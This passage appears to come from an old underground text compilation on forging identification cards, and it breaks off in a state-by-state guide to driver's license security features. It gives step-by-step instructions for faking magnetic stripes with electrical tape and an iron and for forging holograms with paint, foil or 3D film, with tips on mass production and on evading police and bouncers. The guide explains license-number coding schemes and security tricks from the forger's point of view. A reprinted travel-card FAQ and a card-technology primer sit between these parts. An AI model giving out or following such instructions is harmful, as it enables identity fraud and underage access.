COPS ARE TRAINED! You can't fool a cop +C) MOST WALLETS HAVE AN ID SLOT WITH A THICK VYNIL WINDOW! Use it! It will distort a +real ID even a little more difficult to see Imperfections +=============================================== +International ID Cards +article by {hxxp://www.counciltravel.com/idcards/default.asp} +{How to Apply for your International Identity Card: hxxp://www.counciltravel.com/idcards/apply.asp} +IYTC FAQ +What is the International Youth Travel Card? - +The International Youth Travel Card (IYTC) is an internationally recognized identification card for +anyone under 26 years of age who is not a student. The card is administered internationally by the + +International Student Travel Confederation (ISTC) and is administered in the U.S. by Council Travel. The +IYTC in the past has been known as the GO25 Card but its name has been changed to better fit the card. +I am under 26 years old, but why do I need the IYTC? - +IYTC is officially endorsed by international organization, national governments and student +organizations. With the IYTC, you'll have access to special discounts on airfare, accommodations, +transportation and much more! +Where can I get a list of these special discounts? - +Details of the benefits and discounts for the card are outline in the free Z-Card that is distributed with +each card or visit the International Student Travel Confederation's (ISTC) Web site for specific discounts. +How long will my Identity Card be valid? - +The IYTC is valid for one year from the date of purchase. +How can I purchase the International Youth Travel Card (IYTC)? - +To purchase the card in the U.S., see the How to Apply page. To purchase an ISIC outside the U.S. visit +the International Student Travel Confederation (ISTC) web site to find the Issuing Office nearest you. +What if I'm not under 26 years old? - +If you are a student, you are eligible for the International Student Identity Card +If you are a teacher, you are eligible for the International Teacher Identity Card +{Order Now}hxxp://www.counciltravel.com/idcards/OrderCard.asp?Agree=1&name=go%2B25 +ISIC FAQ +What is the International Student Identity Card? - +Endorsed by the United Nations Educational, Scientific and Cultural Organization, the International +Student Identity Card, often called the ISIC (that's "eye'zic"), was initiated to give traveling students a +document that would be readily accepted worldwide as proof of their student status. +I already have a student ID, why do I need the ISIC? - +Your regular college or university ID won't be readily recognized internationally –and sometimes not +even understood. ISIC is the world's most widely accepted student identity card. It is issued in over 90 +countries to over 4 million students yearly . With the ISIC, you'll have access to special discounts on +airfare, accommodations, transportation, basic traveler's insurance and much, much more! +Where can I get a list of these special discounts? - +Details of the benefits and discounts for the card are outline in the free, 128-page International Student +Identity Card Handbook that is distributed with each card. Worldwide discounts are also listed on the +International Student Travel Confederation (ISTC) web site. +How long will my 2001 International Student Identity Card be valid? - +Your ISIC is valid from September 1, 2000 through December 31, 2001. +How do I purchase the International Student Identity Card? - +To purchase the card in the U.S., see the How to Apply page. To purchase an ISIC outside the U.S., visit +the International Student Travel Confederation (ISTC) web site to find the Issuing Office nearest you. +What if I'm not a student? - +If you are under 26 and not a student, you are eligible for the International Youth Travel Card (IYTC) + +If you are a teacher, you are eligible for the International Teacher Identity Card (ITIC) +{Order Now}hxxp://www.counciltravel.com/idcards/OrderCard.asp?Agree=1&name=isic +ITIC FAQ +What is the International Teacher Identity Card? - +The International Teacher Identity Card, often called the ITIC (that's "eye'tic") was initiated in 1984 to +give traveling teachers/faculty a document that would be accepted around the world as proof of teacher +status. ITIC is administered internationally by the International Student Travel Confederation (ISTC) and +is administered in the United States by Council Travel. Issued in over 40 countries and endorsed by the +United Nations Educational, Scientific and Cultural Organization (UNESCO), the ITIC is a basic travel +document for faculty member at all levels. +I already have a faculty ID, why do I need the ITIC? - +ITIC is officially endorsed by international organization, national governments and student organizations. +With the ITIC, you'll have access to special discounts on airfare, accommodations, transportation and +much more! +Where can I get a list of these special discounts? - +Details of the benefits and discounts for the card are outline in the free International Teacher Identity +Card Handbook that is distributed with each card. Worldwide discounts are also listed on the International +Student Travel Confederation (ISTC) web site. +How long will my 2000 International Teacher Identity Card be valid? - +The ITIC is valid from September 1, 1999 through December 31, 2000. +How do I purchase the International Teacher Identity Card (ITIC)? - +To purchase the card in the U.S., see the How to Apply page. To purchase an ITIC outside the U.S. visit +the International Student Travel Confederation's (ISTC) Web site to find the Issuing Office nearest you. +What if I'm not a teacher? - +If you are under 26 and not a student, you are eligible for the International Youth Travel Card (IYTC) +If you are a student, you are eligible for the International Student Identity Card +{Order Now}hxxp://www.counciltravel.com/idcards/OrderCard.asp?Agree=1&name=itic +============================================== +Magnetic Stripes +BR>These only look like the magnetic stipes, they are not working magnetic stripes! +Ok, what you need to make magnetic stipes is just black elecrtical tape, scissors, and an iron. Now cut the +tape so it is the width that you want usually about 1/4 of an inch. And cut it the entire length of the card, +and tape it on. Now this is how the final product will look, but if someone were to examine it they would +find that the tape is elevated off of the card Now what you need to do is place a soft cloth over the card +and iron the tape. Waht you want to do is melt the edges of the tape onto the card so that when you run +your fingers over it you cannot feel the difference. +Keep at it, this sounds A LOT easier than it really is. and also do in on TOP of the lamination, duh. +=============================================== + +ID card Holograms +article by TopHat +A hologram can greatly affect the look of an id, since holograms are incredibly hard to reproduce, one +will almost surely validate the credibility of your card. To make holograms you will need: +Titanium Dioxide Powder (look in chemistry catalogs,labs, some art stores) +Acrylic Base (most art supply stores) Razor Blade ( Revco, your friend for life) +Now mix the powder and base, it be like a paint +with sparkles in it. Now spread it out over the spot +where you want your hologram to be, and use the razor blade +to scrape off the design. Scrap off the paint where you want +just the card to shine through. If you mess up, scrap it all off +and start again. Study the hologram you want to duplicate +throughly so you are able to copy it well. What this basically +is is just paint that has sparkles in it, and when held at an angle +will shine, just like a hologram. Do this UNDER/BEFORE you laminate. +If you plan on mass producing these, I suggest that you make +a stencil out of cardboard or plastic, it will greatly affect +the time and the look. +Holograms peel offs can also be purchased from paper companies, or +police supply catalogs. These are better looking, easier, cheaper, +but come only in limited styles (not likely to find state seals and the like). +other ways are: +Here's what you do: Take the seal off of the template that you are using. Copy and paste it as a new image +in the same location that you took it from on the template. (hint: most graphics programs show the +coordinates of your pointer in the bottom-left corner of the screen) Copy the shape and contents of the +hologram and paste it exactly where it should be on the new image you have created just like you did with +the state seal. Once this is complete, print this out on a transparency sheet. (I usually print out a whole +page them at a time so I don't have to waste transparency sheets) The easiest way the cut-out the +transparency is to lay it right on top of your printed license (paying attention to the location of the seal +and the hologram image) and cut around the edges of the license with an Exact-o knife. Once you have +the transparency sheet cut-out, here's how you turn the hologram into a believable one: Go to your local +office supply company. (Officemax is great) Look for presentation foil sheets ( they are usually right next +to the laminating supplies ). The come in a variety of colors, find one that matches the color of your +state's hologram. Gold colored works for most holograms. Cut a piece of foil big enough to cover your +hologram and then place it in a carrier and run it through your laminator. When it comes out, peel off the +foil paper and you'll be amazed at the finished hologram. Put this back on whatever you are going to +laminate and then put the whole thing in a pouch a laminate it. You will never notice the transparency +sheet being there. Don't be cheap and use an iron to laminate, spend $50 and buy one (use a minimum of +5 mil laminating pouches) One more thing, Scotch makes a restickable adhesive glue stick so you can +paste a remove your photo, or whatever, as many times as you want to ensure that you get the photo on +straight. (to paste the photo on --if using Polaroid's) IMPORTANT: Make sure to let the Polaroid's sit for +at least 30 minutes before you peel the back layer off of them. If you don't give it time, pieces of the +Polaroid ink will stay on the backing paper leaving you minus facial features. But, make sure you take the +backing off of the Polaroid or else it won't look genuine, the picture will stick out. +or... + +First your going to need the real thing if you can get a holo. Go to walmart or any Photoshop, and invest +in some of the 3D Film. Now you can buy the cheap kind that comes in the disposable camera or you can +buy the real stuff at most photoshops. As always, the more money you spend usually the better its gonna +look. Now while your there look for the transparency paper. any transparency plastic sheets will work, but +if you buy the ones from the photoshop your chances of a better look HOLO go up. +Once you got your supplies, expose a whole role of film on your holo. 3D doesnt always come out the +greatest so you'll probably get 4 or 5 good ones out of a role of film. Now when you go to get these +developed you want to get them printed, and you want to keep the negatives. This way you can find the +best ones and know which negative they corespond to. When you choose your best negatives, Here comes +the hard part. +You need to have some sort of access to a dark room, and hopefully you know how to develop pictures. +Any old Darkroom will work. As long as you have taken photography or know the basic gist of it, you +will be fine. Now what what you want to do is make your own prints on the transparency sheets. This is +tricky, becuase if you move it at all when it is being developed the HOLO's will blur. So basically get a +bunch of time and a bunch of negatives and a bunch of transparency sheets. Try to have someone who +knows hwo to develop film with you. This helps. Also when you ary drying the photo try to keep all light +away from it. when you normally print you can turn the lights on a and let them dry. With holo's let them +dry completely in the dark. Dont use a hairdryer or anything to speed the process up, that will fuck things +up. be prepared to spend some time before you get the hang of it. +============================================== +Primer on Electronic Card Technologies +article by CyberChix +Yesterday, I used a magnetic stripe credit card to pay for a purchase at a local clothing store; at the same +time, I presented my storage-only contact card to add my frequent buyer points. Next, I used my memory +chip with register contact card to make a prepaid phone call. +Later in the day, I stopped at the bank and used my microprocessor contact card to withdraw some money +from my checking account. (Thankfully, I remembered my PIN number.) Then, I stopped by the daycare +to pick-up my son; I used my contactless card to enter the building. +Next, we entered the transit station and caught the bus to head home. I am so glad I finally got those +combi cards to pay our toll. It sure makes getting around quick, simple and hassle-free. +I needn’t bore you with anymore details of my life. But, I’m sure you get the picture. +How many times today did you use an electronic card? What type of technology did it employ? What +purpose did the card serve? +ELECTRONIC CARD TECHNOLOGIES IN TODAY’S MARKETPLACE +Let’s take a quick look at the electronic card technologies being used in today’s +marketplace and what applications commonly use these technologies. With a basic +understanding of how these different types of cards work, you will begin to see the +endless possibilities for their application. +• MagneticStripeCards +• Memory and Microprocessor Smart Chips +• ContactCards +• ContactlessCards +• Hybrid/Twin Cards +• CombiCards +• Proximity Cards +• OpticalCards + +Magnetic Stripe Cards +Magnetic stripe cards are everywhere. This well-established technology is common in industries with +low- to medium-data storage needs. +The most common applications for magnetic stripe cards are financial cards, transit tickets, and ID cards. +• Bank credit and debit cards. +• Prepaid telephone and vending cards. +• Subway, railroad, bus, toll road, and airline cards. +• Driver licenses, employee ID badges, membership cards, and door keys. +Magnetic stripe cards have a black or brown magnetic stripe made up of magnetic particles of resin. +These types of cards can be either low-coercivity (LoCo) or high-coercivity cards (HiCo). +Coercivity is the ability of a property to resist demagnetization. It is measured in oersteds (Oe). The +material used for the particles determines the coercivity of the stripe: low- coercivity stripes at 300 Oe are +made of iron oxide and high-coercivity stripes at 2750 to 4000 Oe are usually made from barium ferrite. +The higher the coercivity, the harder it is to encode information — and to erase information. +Memory and Microprocessor Smart Chips +Before we take a look at the many types of smart cards, it’s important to understand the various chips +found in these cards. The chips used in contact, contactless, hybrid/ twin, and combi cards fall into two +categories: memory and microprocessor. +Memory Chips +A memory chip is similar to a small floppy disk. This type of chip primarily stores information, access +control, or a value that can be “spent.” It holds anywhere from 103 bits to 16,000 bits of data. +Memory chips are less expensive than microprocessors, but they also offer less security because they +depend on the security of the card reader. Because of this, memory chips are ideal for use in applications +requiring low- to medium-security. Memory chips can be divided into two categories: Storage-Only and +Memory Chip with Register.TheStorage-Only Memory Chip has rewriteable memory. It is often used in +loyalty applications to store a buyer profile. The buyer earns points as they spend money and these points +are later redeemed for various rewards. The Memory Chip with Register begins with a value that +decreases with use. It is not +rewriteable; once the value is exhausted, the card is discarded. The most common applications for this +chip are prepaid telephone and vending cards. +Microprocessor Chips +A microprocessor chip can add, delete, change, and update information. It is +basically a computer with an input/output port, operating system and hard disk. +Microprocessor chips come in 8-, 16-, and 32-bit formats with data storage +capacities ranging from 300 to 32,000 bytes. +Microprocessor chips offer a high degree of security to the user. They have the +ability to verify the cardholder with a PIN (or other secret code). Banking, +identification, healthcare, and other industries that require high security are +currently utilizing microprocessor cards. +Contact Cards + +A contact card has a gold chip embedded in the card; the dimensions and location of the chip are standard +and are defined in ISO 7816-2. This kind of card requires insertion into a smart card reader and a direct +connection with the physical contact points on the card to transmit data. Contact cards are used frequently +in banking, communications, healthcare, loyalty, and storing automotive service histories. +Contactless Cards +Contactless cards have an antenna coil and a chip embedded in the card. This type of card must pass +within varying degrees of proximity to a smart card reader. The embedded antenna communicates with a +receiving antenna at the transaction point. Access control, student identification, electronic passport, +vending, parking, and toll are common applications for contactless cards. +• Immediate proximity smart cards must pass less than 1 millimeter from the reader and be precisely +aligned. +• Close proximity smart cards must be between 1 and 2 millimeters from the reader in a specific +orientation. +• Remote coupling smart cards can function in a range from a few centimeters up to 3 to 5 meters from +the reader in any orientation. +Hybrid/Twin Cards +A hybrid/twin card has two chips embedded in it: a contactless chip and a contact chip. The chips may be +memory or microprocessor chips. The contactless chip is for applications demanding fast transaction +times — like mass transit. The contact chip is used in applications requiring higher security. The two +chips are not connected to each other. Instead, one chip serves the consumer needs and the other the card +issuer needs. This type of card also offers a temporary solution for contact card systems switching to +contactless. +Combi Cards +The combi card — also known as a dual-interface card — offers a contact and contactless single chip. +This is a popular form of smart card because it extends ease-of- use to both the card issuer and the +consumer. Mass transit is expected to be one of the more popular applications for the combi card. In the +mass transit application, the contact interface may be used to place a cash toll value on the combicard +whilethecontactlessinterface isused to remove atollvalue. +Proximity Cards +Proximity cards utilize contactless technology. They are growing in popularity because of the +convenience they offer markets like identification, mass transportation, security, and access control. +Contactless cards, hybrid/twin, and combi cards are examples of different types of proximity cards. +Here's how they work: +• An antenna is embedded in the card. +• The card passes within range of a reader, which activates the reader. Immediate proximity cards must +pass less than 1 millimeter from the reader and be precisely aligned. Close proximity cards can be read up +to 10 centimeters from the reader in a specific orientation. +Vicinity cards can function in arangefrom30to70centimetersfromthereader in any orientation. +• The embedded antenna communicates with a receiving antenna in the reader. The reader then sends the +data to the host computer for processing. Proximity card technology is employed in a variety of markets +including identification, analysis, transportation, distribution, industrial, security, and access control. +Optical Cards +Optical cards employ a CD-ROM type of technology to store information. A section ofthe lasersensitive +mediaislaminatedinto acardand isused to storedata.The mediaisawrite once read many(WORM)media. + +An optical card stores between 4 and 6.6 MB of data. This makes it an ideal carrier for graphics such as +photographs, logos, fingerprints, x-rays, etc. Data is encoded in a linear x-y format. ISO/IEC 11693 and +11694 standards cover the details. Optical cards currently are utilized to store prenatal-care records, +medical images, and personal medical records. +They are also commonly used in the following applications: +• High-security drivers’ licenses and access/entry cards. +• Auto repair/warranty records. +• Secure bank debit cards. +• Immigrant ID cards. +• Automated cargo manifests for the Department of Defense logistics. +============================================= +Guide to US & Canadian +Drivers License Security Techniques! +article by {Egg} +The following is a state by state (and Canadian province) list of tricks that are used on drivers licenses to +prevent forgery. +One other thing. One the most common and easy to use security checks in use today is the Soundex +system. You will notice that many states incorporate this into their licenses. I feel that everyone interested +in the topic covered by this file should be made aware of this systems simplicity and also it's danger (to +the unknowing), so I have included, at the end of this file, an explanation of the Soundex system. +- UNITED STATES LICENSES +- CANADIAN LICENSES +- SOUNDEX SYSTEM +------------------------------------ +UNITED STATES LICENSES +Alabama: +This license is a photo ID card laminated in plastic. The driver's photograph is on the lower left corner, +and overlapped by the state seal. The drivers license number and birth date are embossed at the top, and +license of minors under 21 are further identified by a star embossed after the birth date. +Alaska: +This license is encased in plastic. If needed, "CDL" and the appropriate class appear in the class box. The +manufacturer is Polaroid. +In the Minor's license, a red vertical "ALASKA" is on the left side, "UNDER 21" on the right side of the +laminate and "UNDER 21" or "*U21*" is below the photo. Prior licenses have birth date only. +The state seal and camera number overlap the photo. There is a raised hologram on the current license. +The license number is up to 7 digits, without spacing, and it is not coded. +The license expires on the person's birthday five years after it has been issued. The certificate of the + +extension, found on the back of the license, can extend the expiration for one 5-year term for drivers +under the age of 69. The operator must be atleast 16 years old. +This license is also a photo laminated type, but the lettering on it may be typewritten or "computer type," +which offers the forger a choice. The signature of the Commissioner overlaps the photo. An additional +safeguard is that the state seal overlaps the driver's signature. +Arizona: +This is a polyester photo ID card, but it is not laminated. The state seal is on the front of the license +surrounded by a printed orange pattern which overlaps the type. The Assistant Director's signature is on +the bottom. The driver's name, address, and other data may be typed or written in by hand. +Arkansas: +The current license is in credit card style with a ghost image and a yellow header. It has a 2d bar code and +magnetic stripe on the back. Prior licenses are digitized with magnetic stripe on back. For CDL, blue map +enclosing "CDL" and "Commerical drivers License" at right. "Commercia Drivers License" in green ink +for prior CDL +Current license has a red header, a red border around the photo, birth day in a red box, "UNDER 18" and +"UNDER 21" statements. Prior license uses same statements +This is a laminated photo ID, using the state seal overlapping the photo as a safeguard. +California: +The two newest formats have a pattern of the state seal and the DMV logo, which is in an optically +variable gold ink in the newest format. The license may have a bar code and a magnetic stripe on the +back, or just a magnetic stripe. The prior license has a retroreflective laminate on the front. The CDL has +"COMMERCIAL DRIVER LICENSE" in brown. +The Minor's license has the photo on the right. One license has "Provisional" and "Age 21" highlighted in +blue or red color, respectively. Another license has "PROVISIONAL UNTIL AGE 18 IN (date)" in white +letters on a blue bar, or it may have "PROVISIONAL UNTIL AGE 18" in red letters, for those under 18 +years of age. The under 21 licenses have "AGE 21 IN (date)" in white letters over a red bar or in red +lettering, or "UNDER 21 UNTIL (year)" in red or black. +One license has the state seal and DMV logo in an optically variable gold ink, microprinting and a +secondary photo. Another license has a translucent hologram of the state seal and the DMV logo. Prior +licenses have hidden reproductions of the state seal and "California" on the surface. +The license number has one letter, and 4-7 digits, which are unspaced and uncoded. +The license is valid for 4 years for an original license, or 4 or 5 years for a renewal license, which expire +on the birth date. An accompanying certificate can extend the license for two 4 or 5 year terms. The +operator's minumum age is 16. +This license is photograpghic, with a high-tech lamination the front. Type may be typewritten or +computer type. The state seal and the name "California" are hidden in the laminate. +Colorado: +One license is made of durable plastic with a scenic backdrop of mountains, a digital photo at the left, and +a ghost image on the right. Another license is photographic and encased in plastic. "COMMERCIAL +DRIVER LICENSE" for the CDL is below the state heading for the first license, and in a yellow band + +below the heading for the second. The first has a magnetic stripe and 2D bar code on the back, and the +second just has the magnetic stripe. +The Minor's license is in the vertical format, and has "UNDER 21" in red above the photo, along with a +ghost image on the right. A probationary license has a gradient gray background. The other license has a +profile photo prior to 8/94, but now features a full-face photo. "UNDER 21" in a yellow bar, or "UNDER +18" in a red bar is on the right. The prior license has license numbers prefixed with an M for those under +18, and P for those between 18-20, along with "UNDER 18" or "UNDER 21" in a box to the right of the +license number. +The first license has the state seal in a continuous row across the center, and the other license has a row of +state seals across the bottom. Prior licenses have the state seal at the top of bottom edge of the photo and +data area.The license number has 9 numbers, and prior licenses usually have 1, but up to 5 letters and up +to 6 digits. +The adult licenses are valid for 5 years, and for 4 years if commercial licenses, which all expire on the +birth date. Under 18 and Under 21 licenses expire 20 days after the 18th and 21st birthdays, respectively. +One-year extensions are available for out-of-state renewals, and 2 extensions are available for out-of- the- +country applicants. The operator's minimum age must be 16. +This is a photo-Id with a polycarbonate (Lexan) coating. This makes it very durable, as well as unusually +flexible. The material gives it a different "feel" from most photographic materials. The state seal is in the +center, and the Director's signature is in black. +The Colorado Id has about 5 holograms on it, all on the bottom of the ID. They are not true holograms, +instead if you tilt the Id you will see these five holograms that simply look like gold. There is not a full +color spectrum in the hologram. The hologram is of the state seal, and each one is a little more then a half +inch in high. +A trick used on the Colorado Id is that of the information field "Hair." On most Ids it is actually spelled +'Hair', but instead on the Colorado it looks to be spelled with an 'e' instead. So sometimes bouncers will +look at this and if it looks like it is spelled 'Hair' then they will pull out the Id book. +Connecticut: +This license is laminated, has a digitized shadow image of the driver, and the commisioner's signature +overlapping the photo, which may be omitted on some. The CDL has "COMMERCIAL/DRIVER'S +LICENSE" in green on the upper-right corner. +The Minor's license has "UNDER 21 UNTIL XX-XX-XX" in red over the picture instead of the two flags +commonly seen on regular licenses. +The current license has a row of state seals at the bottom of the license, and an outline of the state with the +state name diagonally through it, which is visible under black light. Another version has a rectangular +security feature which overlaps the photo, ghost image and the data area. Both versions have authorizing +signatures overlapping the photo, even though some issues of the other version failed to include this. +There is also a ghost image. Finally. the state seal and camera code are visible over the lower right corner. +The license number is 9 digits without spacing. The first two digits are 01-12 according the month of the +driver's birth if the birth year is odd, or 13-24 if the birth year is even. +The license is valid for 3-5 years, and expires on the person's birthday. The operator's minimum age is 16. +This is a Polaroid photo card, laminated in plastic with the gold printing "CONNETICUT" on the plastic. +A gold "Y" is in the typed area for minor's licenses. There are several other tricks and kinks to this +license: +The Commissioner's signature is on the edge of the photo. The first two digits of the nine-digit license + +number are coded. For drivers born in odd years, the first two numbers denote the month of birth by the +numbers 01-12. Those born in even years have the numbers 13-24 to denote birth month. +Delaware: +This is also a photo-ID with lamination. The safeguards are the +Director's signature on the edge of the photo, the date and fee at the bottom, and a red background for the +photos of those under age 21. +District of Colombia: +The proposed license is a credit card style with a blue header bar, which is not embossed. The driver's +photo is on the left with a shadow image on the right side for all licenses. The current license is +photographic and encased in plastic. "CDL" appears in the type box on both licenses is applicable. +The Minor's proposed license will be in the vertical format for those under 21. The graduated license will +be issued to those under 21. The current license has a profile photo used for those under 21. Restriction 3 +is applied to those under drivers under 18. +The proposed license has a security overlay with "WASHINGTON DC A CAPITAL CITY". The current +license has an authorizing signature above the photo, a District seal in the data area, and a DC outline and +ussuing office number which overlaps the photo. The District of Columbia emblem (3 stars above 2 bars) +is in red at the bottom right. "WASHINGTON DC A CAPITAL CITY" is in a gold, repetitive pattern. +The license number is the social security number or an assigned number consisting of 7 computer- +generated digits. +The license is valid for 4 years from the date issued, and may be valid for 5 years, expiring on the birth +date. The operator's minumum age is 16. +DC issues photo-laminated ID with the Administrator's signature or the outline of the district map on the +edge of the photo. The license number may be the Social Security number or one assigned by the issuing +agency. The trick in this license is the code number "3" in the space for "Restrictions" to identify minors +under 18. +Florida: +This license is made of PVC and has a holographic overlay and a magnetic stripe on the back. Prior issues +are encased in plastic with variations in the statement above the signature. The CDL has "*CDL*" below +the license number in the previous issue, and the current issue has "CDL" followed by the class on a blue +bar on the left. +The Minor's license has "UNDER 21 UNTIL (date)" in a red bar below the photo. Prior issues have a +yellow photo backdrop and after July 1989, a red vertical "UNDER 21" overlaps the photo's right edge. A +vertical license is currently under consideration for 2000. +The current license has a holographic overlay of "Florida" and the state outline. Previous issues have the +state seal and the camera number overlapping the photo, along with a vertical "FLORIDA" visible in +ultra-violet light. Another issue has a state seal and a radiating security pattern in the data area. +The license number has 13 characters using the Soundex system. The first is the first letter of the driver's +last name. The next 3 digits are the last name in Soundex code, and the next 3 are department coding. The +next two are the year of birth, the next three are the coding of the birth date and sex, and the last digit is a +check digit, which may not appear. Previous issues have 12 characters, set up as 4-3-2-3 also beginning +with the first letter of the last name. + +The license is valid for 4-6 years, expiring on the birthday with an 18-month early renewal option. A +sticker can extend the license another 4 years if the license was issued between November 1985 and +November 1989. The 4 and 6-year extension program was reinstated in 1992. The non-digital licenses can +have two extensions. The operator's minimum age is 16. +This state issues photo-laminated ID with the state seal and camera number overlapping the photo. The +license number follows the Soundex system and begins with the first letter of the last name and looks like +this: J123-123-39-123. The two digit group is the birth year. An additional trick is that minors under 21 +have a yellow background on their photos. The most difficult to overcome trick used with this license is +state seals printed in ink visible only under ultraviolet light. +Georgia: +The license is photographic and laminated. Current licenses have a bar code on the back and a +holographic patch in the front. On prior licenses, the photo runs from top to bottom on some issues, and +the data box titles may vary. Current licenses have "Georgia" followed by "COMMERCIAL DRIVER'S +LICENSE" in a goldish- yellow. Prior issue has a yellow "GEORGIA" followed by "COMMERCIAL +LICENSE" or "COMMERCIAL DRIVER'S LICENSE" in smaller black letters with the same words in +yellow across the data box. +The Minor's license has "UNDER 21" vertically to the left of the photo, the 21st birthdate, "UNTIL (21st +birthdate)", a picture border, and heading all in red. The prior issue had "UNDER 21" in red on the front. +The current license has "Georgia" in a holographic patch over the driver's date of birth and the state seal. +The prior issue has the Commissioner's and the Governor's signatures, and the state seal overlapping the +photo. +The license number is up to 9 digits, and not coded. The Social Security number or a control number is +used. +The license is valid for 4 years, expiring on the birthday. An honorary veteran's license may be updated +by having the department sticker attached to the back. The operator's minumum age is 16. +This is a photographic laminated card with the blue state seal on the front, surrounded by a pattern of +orange lines. The safeguards include both the Governor's and Commissioner's signatures, but not +overlapping the photo. Drivers under 20 have a red bar at the top of the card. +Hawaii: +This license is a plastic card with a rainbow on the front. The CDL has "CDL" in red letters below the +"CTY" field at the right side of the license. +The Minor's license has "UNDER 21 UNTIL (month-day-year of 21st birthday)" in red below the license +number. +The current license has a holographic overlay of a hibiscus flower and "Aloha State" repeating over the +face of the license. The prior license has a hologram with "ALOHA STATE" over the date of birth which +encroaches into the picture area. +The license number is the Social Security number. The license number may change to an alternative +system beginning in 2001 if pending legislation approves it. +The license is valid for 6 years for those 18-71 starting July 1997, expiring on their birthday. The license +is valid for 4 years for drivers 15-17, and for 2 years for drivers 72 and older. Before 1997, people +between 15-24 and adults 65 and older were issued licenses valid for 2 years, and all others expired after +4 years. The license can be renewed 6 months prior to expiration, even making some licenses (depending + +on birth date) valid for over 6 years. The operator's minimum age is 15, which may change to 16. +This looks more like a bank card than the typical drivers license because the data is embossed. The photo +is at the upper right, embedded in the plastic card. An additional 10-digit number is at top right, above the +photo, and minors under 17 are identified by having their photos in profile. +Idaho: +This license is photographic and encased in plastic. Older issues have date in boxes. The CDL has a +notation above the signature, or "SEASONAL CDL" printed vertically in red on the left and right sides of +the laminate. +The Minor's license has "UNDER 18 UNTIL (date)" in the donor area for those under 18 and "UNDER +21 UNTIL (date)" below the birth date for those under 21, starting January 2000. "UNDER 21" is also +stamped in red to the right of the address for drivers under 21. Previous issues might not have the red +stamp and some of the oldest issues may have profile photos. Drivers who are 15 are restricted to only +driving during daylight until they are 16. +There is a repetitive gold state seal on the license, and the camera number splits the line on the right edge +of the photo. An additional number must appear below the driver's license number. +The license number has 9 characters: 2 letters, 6 numbers, and 1 letter, starting May 1993. Before that +date, the Social Security number or an assigned number, starting with 910, 920, or 940 and then 6 digits, +was used. +The license is valid for 4 or an optional 8 years for those between 21 and 62, starting January 2000. +Before that date, licenses are valid for 4 years. If a renewal sticker is attached to the back of an expired 4- +year license, the license is extended for one more 4-year term. A separate 1-year extension is available. +The operator's minimum age is 15 with driver training, with a daylight restriction until 16. +This license is a laminated Polaroid with a gold pattern in the lamination. Minors under 19 are identified +by a photo in profile, instead of full-face. The license number may be the Social Security number. +Otherwise, it's 9 digits beginning with "910" or "911". Only the Social Security number is hyphenated. +Illinois: +The current license is digitized with a retroreflective hologram. The CDL has a notation above the photo. +The Social Security number may appear beside the birth date on the current license or above it for prior +issues, but this is optional. +The Minor's license has a red headbar, and a red aura around the state seal. "UNDER 21 UNTIL (date)" is +in the headbar, and the birth date is blocked in red. Prior licenses have a red photo backdrop, red bars at +the top and bottom (in the laminate) and "UNDER 21" on the right side of the laminate and on the back +for those under 21. +Current licenses have a hologram that says "A Safer State with .08" repeating across the bottom, and .08 +is inside the state outline. Prior licenses have a raised hologram over the birth date area and the photo +edge. Prior licenses have a small repetitive pattern of "ILLINOIS" across the data area. +The license number is the first letter of the last name, followed by 11 digits. XXX for the last name +coded, XXX for the first name and middle initial coded, XX for the year of birth not coded, and XXX for +the day and month of birth and sex, which might be different if two drivers have the same name and birth +date. +The nonrenewal licenses are valid up to 5 years, and the renewals are valid for 4 years, expiring on the +birthday. The Minor's license expires 3 months after the 21st birthday. The license can be extended for 4 + +years with a renewal sticker, as of January 1997. The operator's minimum age is 16. +This is a laminated Polaroid photo-ID with the repetitive letters "ILLINOIS" on the laminate. This license +is full of tricks. As a start, the photo has a number overlapping it. The license number itself is coded. It +begins with the first letter of the last name, followed by three digits coded on the last name. The next +three digits are a code based on the first name and middle initial. The next two digits are the year of birth +and the last three digits signify the person's sex, and the month and day of birth, again in code. The +number is hyphenated in a misleading way, though: A123-4567-8901. +Indiana: +The current license is digitized with a security coating. The prior license is photographic and encased in +plastic. The prior issues use slash marks in some date fields and the donor field may not be present. The +current license uses red shading and "COMMERCIAL DRIVER LICENSE-CLASS X" for CDL. The +prior issue has a yellow headbar and has "COMMERCIAL/ DRIVER'S LICENSE". +The Minor's license has "Under 21 Until (date)" below the photo in red. Starting January 1999, drivers +under the age of 18 have "PROBATIONARY" under license type. The older issue has a red photo +background for drivers under 21. +The current license has a torch-and-stars pattern on laminate which is visible when tilted. The prior issue +has the camera number overlapping the photo edge and a gold "INDIANA" pattern repeating on the +laminate. +The license number is a 10-digit number spaced as XXXX-XX-XXXX and is not coded. +The license is valid for 4 years, expiring on the birth date, beginning January 1998. Before that date, the +license expires on the last day of teh birth month. Drivers who are 75 or older receive 3-year licenses. The +minimum operator's age is 16 years and 30 days. +This is a photo ID with a laminate on the front, which gives it a silky texture. There's nothing significant +about the license number, which may be a Social Security or other number with 9 digits. One trick used in +this license is listing both the expiration date and the date for re-examination. If they don't match, the +license is fake. Additionally, there are state seals hidden in the plastic. +Iowa: +These licenses are the credit-card style, with bar codes and a magnetic stripe on the back. The prior +license is enclosed in plastic. The CDL has a green header and a picture border, along with "IOWA +COMMERCIAL/DRIVER LICENSE". The prior license has "CDL" down the right side of the license. +The Minor's license has drivers under 18 receiving a first-level operator license with a fuchsia header and +a picture border, titled "IOWA INTERMEDIATE/DRIVER LICENSE". "Under 18/ 21 Until MM-DD- +YY" apprears under the photo. Older formats have "UNDER 21" or "MINOR" down the right side. +Current licenses have name and address in red below photo, and the last two digits of the date of birth are +in red under the expiration date. +The director's signature and station number overlap the photo. There is also a multicolored state seal and a +DOT logo repeating in the security laminate. +The license number is the Social Security number, or a combination of 3 numbers, 2 letters, and 4 +numbers. +The license is valid for 2 or 4 years, expiring on the birthday, with a 60-day grace period. 2 or 4-year +extensions take effect when they are accompanied by a renewal certificate. Also, two 6-month extensions +are available. The first-level operator's license is good for up to one year. The operator's minumum age is +16, but the restricted license is available to those who are atleast 14. + +This is a photo-ID laminated in plastic. The tricks employed in this license are that the Director's +signature and the station number overlap the photo. The license number may be the SS number or nine +digits and letters. Minors under 19 have their photos in profile. An additional trick is the lettering "IOWA +DEPARTMENT OF TRANSPORTATION" in the plastic. +Kansas: +This license is encased in plastic with or without rounded corners. A holographic rectangle is on the front, +and and there is a magnetic stripe on the back. The Administrators' names may vary. For the CDL, "CDL" +is on the headbar. +The Minor's license says "NOT 21 UNTIL XX-XX-XXXX" in white letters on a red band below the +photo or "NOT 18 UNTIL XX-XX-XXXX" in black letters on a green band beginning July 1997. Drivers +14 to 16 have J02 or J09 in the restriction field or "Age Restricted to 16" or "Farm Permit". +The license uses a holographic rectangle which shows "KANSAS" in blue to the right of the photo. +The 